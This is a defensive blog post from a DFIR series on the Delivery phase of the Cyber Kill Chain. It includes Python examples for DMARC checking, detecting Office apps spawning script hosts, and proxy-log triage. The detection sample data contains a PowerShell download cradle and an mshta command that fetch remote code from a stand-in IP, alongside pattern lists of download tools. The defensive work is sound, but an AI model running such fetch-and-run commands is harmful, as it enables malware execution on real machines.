Welcome back to our ongoing Digital Forensics & Incident Response (DFIR) series. Last time, we explored Weaponization—where adversaries convert raw intel into potent payloads. Now, we move into the third phase of the Cyber Kill Chain: Delivery.
This is the pivotal moment when the attacker sends their crafted exploit into the wild—aimed directly at your environment. Whether it’s through email, a compromised website, or a rogue USB device, the goal is always the same: get the payload to the target.
🚚 What Happens During Delivery?
Delivery is the handoff—the transfer of the weaponized payload to the victim. Depending on the attacker’s strategy and reconnaissance data, they may use:
- Phishing emails with malicious attachments or links
- Malicious websites serving drive-by downloads
- Compromised third-party software updates
- Infected removable media (e.g., USB drives)
- Social engineering lures tied to current events or org-specific info
🎯 Why Delivery is a High-Risk Phase
Unlike Weaponization, which happens entirely on the attacker's side, Delivery is the first phase that touches your infrastructure: the payload has to pass your email gateway, your web filters, or your endpoints to reach the target. That makes it the first phase you can actually observe and block, and if it succeeds it opens the door to Exploitation and compromise.
🔍 Common Delivery Tactics & Tools
| Method | Description |
|---|---|
| Spear-Phishing | Targeted emails laced with malicious links or documents tailored to recipients |
| Malvertising | Ads on legitimate sites redirect victims to exploit kits or fake downloads |
| Watering Hole Attacks | Compromising a website known to be frequented by targets |
| USB/Media Drops | Malicious code delivered via physical devices left in target locations |
🛠️ Tools Defenders Can Use to Detect & Prevent Delivery
1. Email & Web Filtering
- Deploy secure email gateways (SEGs) with sandboxing capabilities
- Filter inbound mail on sender IP reputation, known-bad attachment hashes, and domain reputation
- Use SPF, DKIM, and DMARC to authenticate senders: SPF and DKIM verify the sending host and the message signature, and DMARC checks that either one aligns with the visible From: domain and tells receivers what to do on failure

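To make the SPF/DKIM/DMARC bullet concrete, here is an added example (not code from this series or from any gateway product) of how a gateway, or an analyst looking at a suspect message, evaluates the Authentication-Results header that a receiving MTA stamps on mail: it parses the SPF and DKIM verdicts, checks relaxed DMARC alignment against the From: domain, and refuses to trust a header that was not stamped by our own MTA. The two messages, the domains, the trusted authserv-id `mx.example.com` and the two-label organisational-domain shortcut are all constructed assumptions.

```python
import email
import email.utils
import re

# A sender can inject a forged Authentication-Results header, so only trust a
# stamp whose authserv-id is our own gateway (assumed here to be mx.example.com).
TRUSTED_AUTHSERV_ID = "mx.example.com"

# Constructed sample 1: From: is spoofed as example.com. SPF and DKIM both
# pass, but for the attacker's own domain, so neither aligns with From:.
SPOOFED_MESSAGE = """\
Authentication-Results: mx.example.com;
 spf=pass (sender IP is 203.0.113.7) smtp.mailfrom=bounce@mailer-example.net;
 dkim=pass header.d=mailer-example.net header.s=sel1;
 dmarc=fail (p=reject) header.from=example.com
From: "HR Department" <hr@example.com>
To: alice@example.com
Subject: Updated payroll policy - action required

Please review the attached document.
"""

# Constructed sample 2: a legitimate notice, DKIM-signed by example.com.
LEGIT_MESSAGE = """\
Authentication-Results: mx.example.com;
 spf=pass smtp.mailfrom=notify.example.com;
 dkim=pass header.d=example.com header.s=corp2024;
 dmarc=pass header.from=example.com
From: "IT Notices" <it-notices@example.com>
To: alice@example.com
Subject: Scheduled maintenance

Mail will be briefly unavailable on Saturday.
"""


def parse_auth_results(value):
    """Split an Authentication-Results value into (authserv-id, {method: {...}})."""
    flat = re.sub(r"\s+", " ", value).strip()
    authserv_id, _, rest = flat.partition(";")
    results = {}
    for clause in rest.split(";"):
        m = re.match(r"\s*(\w+)=(\w+)", clause)
        if not m:
            continue
        method, result = m.group(1).lower(), m.group(2).lower()
        # dotted properties such as smtp.mailfrom=, header.d=, header.from=
        props = {k.lower(): v for k, v in re.findall(r"(\w+\.\w+)=(\S+)", clause)}
        results[method] = {"result": result, **props}
    return authserv_id.strip().lower(), results


def org_domain(name):
    """Organisational domain for relaxed DMARC alignment. Simplification:
    the last two labels; real implementations consult the Public Suffix List."""
    host = name.lower().rstrip(".").rpartition("@")[2]
    return ".".join(host.split(".")[-2:])


def aligned(result, identifier, from_domain):
    """Relaxed alignment: the authenticated identifier shares From:'s org domain."""
    return result == "pass" and bool(identifier) and org_domain(identifier) == org_domain(from_domain)


def evaluate_message(raw):
    """Decide whether a message passes DMARC-style alignment checks."""
    msg = email.message_from_string(raw)
    from_addr = email.utils.parseaddr(msg.get("From", ""))[1]
    from_domain = from_addr.rpartition("@")[2].lower()
    authserv_id, res = parse_auth_results(msg.get("Authentication-Results", ""))
    verdict = {"from_domain": from_domain, "authserv_id": authserv_id}
    if authserv_id != TRUSTED_AUTHSERV_ID:
        # Not stamped by our gateway: treat as unauthenticated, never as a pass.
        verdict.update(dmarc_pass=False, action="untrusted-authserv")
        return verdict
    spf, dkim = res.get("spf", {}), res.get("dkim", {})
    spf_aligned = aligned(spf.get("result"), spf.get("smtp.mailfrom", ""), from_domain)
    dkim_aligned = aligned(dkim.get("result"), dkim.get("header.d", ""), from_domain)
    verdict.update(spf=spf.get("result", "none"), dkim=dkim.get("result", "none"),
                   spf_aligned=spf_aligned, dkim_aligned=dkim_aligned,
                   dmarc_pass=spf_aligned or dkim_aligned)
    verdict["action"] = "deliver" if verdict["dmarc_pass"] else "quarantine"
    return verdict


if __name__ == "__main__":
    for name, raw in (("spoofed", SPOOFED_MESSAGE), ("legit", LEGIT_MESSAGE)):
        print(name, evaluate_message(raw))
```

The spoofed message is the case DMARC exists for: both SPF and DKIM are clean passes, just for the wrong domain. Checking the raw results without alignment would have delivered it. The authserv-id check matters as well: an attacker who knows your gateway name can pre-stamp a passing header, which is why RFC 8601 tells receivers to strip such headers at the border.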
2. Endpoint Monitoring
- Leverage Endpoint Detection and Response (EDR) tools to log payload execution
- Monitor for abnormal process launches, such as `winword.exe` starting `powershell.exe`
- Use behavior-based detections and alerting
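The winword.exe to powershell.exe pair above is the classic sign of a delivered document being opened. Here is an added example (not code from this series or from any EDR product) of the detection logic, generalised beyond the single pair in the text: it runs Sysmon-style process-creation events through a set of rules, flags any Office application spawning a script host, records a macro-enabled document being opened as a candidate delivery artifact, and decodes a PowerShell `-EncodedCommand` payload so the download cradle hidden inside it is visible. The events, user names, paths and the 203.0.113.20 address are constructed.

```python
import base64
import binascii
import ntpath
import re

# Parents that should not launch a script host on a typical workstation: the
# post's winword.exe -> powershell.exe pair, widened to the other Office apps
# and the usual living-off-the-land children.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe"}

# Command-line heuristics, checked on the raw line and on any decoded payload.
CMDLINE_INDICATORS = [
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
                                   r"Start-BitsTransfer|bitsadmin|\bcurl\b|\bwget\b", re.I)),
    ("remote_url", re.compile(r"https?://", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
]
MACRO_DOC = re.compile(r"\.(?:docm|dotm|xlsm|xlam|pptm)\b", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...).
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|n|nc|nco\w*)?\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed events in the shape of Sysmon Event ID 1 (process creation).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.20/a.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")
OFFICE_DIR = r"C:\Program Files\Microsoft Office\root\Office16"
EVENTS = [
    {"UtcTime": "2024-05-02 09:14:01", "User": "CORP\\alice",
     "ParentImage": r"C:\Windows\explorer.exe", "Image": OFFICE_DIR + r"\WINWORD.EXE",
     "CommandLine": '"' + OFFICE_DIR + r'\WINWORD.EXE" /n "C:\Users\alice\Downloads\Invoice_4471.docm"'},
    {"UtcTime": "2024-05-02 09:14:03", "User": "CORP\\alice",
     "ParentImage": OFFICE_DIR + r"\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + ENCODED},
    {"UtcTime": "2024-05-02 10:02:17", "User": "CORP\\bob",
     "ParentImage": OFFICE_DIR + r"\EXCEL.EXE", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://203.0.113.20/update.hta"},
    {"UtcTime": "2024-05-02 10:05:40", "User": "CORP\\bob",
     "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
    {"UtcTime": "2024-05-02 10:30:00", "User": "NT AUTHORITY\\SYSTEM",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_event(ev):
    """Return the rule names the event trips, in evaluation order (empty if clean)."""
    parent = ntpath.basename(ev["ParentImage"]).lower()
    child = ntpath.basename(ev["Image"]).lower()
    cmdline = ev.get("CommandLine", "")
    rules = []
    if child in OFFICE_APPS and MACRO_DOC.search(cmdline):
        rules.append("macro_enabled_document")  # candidate delivery artifact
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        rules.append("office_spawns_script_host")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        rules.append("encoded_command")
    for name, pattern in CMDLINE_INDICATORS:
        if pattern.search(cmdline) or (decoded is not None and pattern.search(decoded)):
            rules.append(name)
    return rules


def detect(events):
    """Run every event through the rules and return the findings."""
    findings = []
    for ev in events:
        rules = analyze_event(ev)
        if rules:
            findings.append({"time": ev["UtcTime"], "user": ev["User"],
                             "parent": ntpath.basename(ev["ParentImage"]),
                             "child": ntpath.basename(ev["Image"]), "rules": rules})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
```

The two Office events are what an analyst wants to see side by side: the document being opened from the Downloads folder two seconds before the child PowerShell, which is how the delivery artifact gets tied to the execution. The SYSTEM-run inventory script is included deliberately: it uses PowerShell with an ExecutionPolicy bypass, yet trips nothing, because the rules key on parent, child and payload rather than on PowerShell itself.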
3. Web Proxy & DNS Control
- Use DNS filtering to block known phishing, malware-distribution, and C2 domains
- Inspect outbound web traffic for anomalous requests
- Integrate threat intel feeds into web proxy solutions
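Here is an added example (not code from this series or from any proxy product) of the triage these three bullets describe, run over proxy log lines: it parses each request, matches the destination against a threat-intel domain list by suffix so that subdomains of a listed domain are caught too, flags requests straight to an IP literal, and flags downloads of executable or macro-enabled file types even from unlisted hosts. The log lines follow Squid's native access.log layout and, together with the intel list, the clients and the 203.0.113.20 address, are constructed; HTTPS requests appear as CONNECT host:port entries, which is what a proxy sees without TLS inspection.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed threat-intel feed (domains only; real feeds also carry IPs, URLs, hashes).
INTEL_DOMAINS = {"mailer-example.net", "cdn-update-check.example"}
# File types worth a second look even when the host is not on a list.
RISKY_EXTENSIONS = re.compile(r"\.(?:exe|msi|dll|hta|js|vbs|ps1|scr|iso|lnk|zip|docm|xlsm)$", re.I)

# Constructed lines in Squid's native access.log layout:
# time elapsed client action/code size method url user hierarchy content-type
PROXY_LOG = """\
1714640043.112    120 10.1.4.22 TCP_MISS/200 48213 GET http://203.0.113.20/a.ps1 alice HIER_DIRECT/203.0.113.20 text/plain
1714640101.551     88 10.1.4.22 TCP_MISS/200 912 GET http://docs.mailer-example.net/Invoice_4471.docm alice HIER_DIRECT/198.51.100.9 application/octet-stream
1714640170.210   1200 10.1.4.37 TCP_TUNNEL/200 6620 CONNECT update.cdn-update-check.example:443 bob HIER_DIRECT/198.51.100.40 -
1714640150.004     40 10.1.4.37 TCP_HIT/200 5120 GET https://www.example.org/index.html bob NONE/- text/html
1714640199.877    300 10.1.4.37 TCP_MISS/200 2211840 GET https://downloads.example.org/installer.msi bob HIER_DIRECT/192.0.2.10 application/x-msi
"""


def parse_line(line):
    """Parse one native-format Squid access.log line into a dict, or None."""
    f = line.split()
    if len(f) < 10:
        return None
    method, url = f[5], f[6]
    if method == "CONNECT":
        host, path = url.rsplit(":", 1)[0], ""  # tunnel: only host:port is visible
    else:
        parts = urlsplit(url)
        host, path = parts.hostname or "", parts.path
    return {"time": f[0], "client": f[2], "user": f[7], "method": method,
            "host": host.lower(), "path": path, "status": f[3].split("/")[-1],
            "content_type": f[9]}


def domain_matches(host, blocklist):
    """True if host or any parent domain of it is on the list (suffix match by label)."""
    labels = host.split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


def is_ip_literal(host):
    """True for requests made directly to an IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def triage(log_text, blocklist=INTEL_DOMAINS):
    """Return the requests that trip at least one rule, with the rule names."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rules = []
        if domain_matches(rec["host"], blocklist):
            rules.append("intel_domain_match")
        if is_ip_literal(rec["host"]):
            rules.append("direct_to_ip")
        if RISKY_EXTENSIONS.search(rec["path"]):
            rules.append("risky_download")
        if rules:
            findings.append({**rec, "rules": rules})
    return findings


if __name__ == "__main__":
    for f in triage(PROXY_LOG):
        print(f["time"], f["client"], f["user"], f["host"], f["rules"])
```

Suffix matching by label is the detail that matters: `docs.mailer-example.net` is caught because `mailer-example.net` is listed, while a look-alike such as `mailer-example.net.example.org` is not, since only whole trailing labels are compared. The installer from an unlisted host produces a finding of its own so that an analyst can decide whether it was an expected download.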
4. User Training & Awareness
- Conduct regular phishing simulation campaigns
- Provide simple, clear reporting paths for suspicious emails or sites
- Train staff to recognize social engineering tactics
⚔️ DFIR Relevance: Why Delivery Matters
During forensic investigations, pinpointing the delivery vector is essential. Was the breach caused by a macro-laden invoice document? A click on a fake HR login page? Tracing delivery tells us how the payload got past the defenses and guides containment, since the same vector usually stays open to the attacker until it is closed.

Artifacts such as email headers, browser history, file hashes, and proxy logs become critical in confirming how the payload entered and what systems it touched first.
🔁 Coming Next: Exploitation
Now that the payload is delivered, what happens when it’s opened? In the next part of our series, we’ll dive into Exploitation: how attackers trigger vulnerabilities to gain access—and how you can detect it early.
Until then, patch those filters, educate your users, and keep your defenses agile.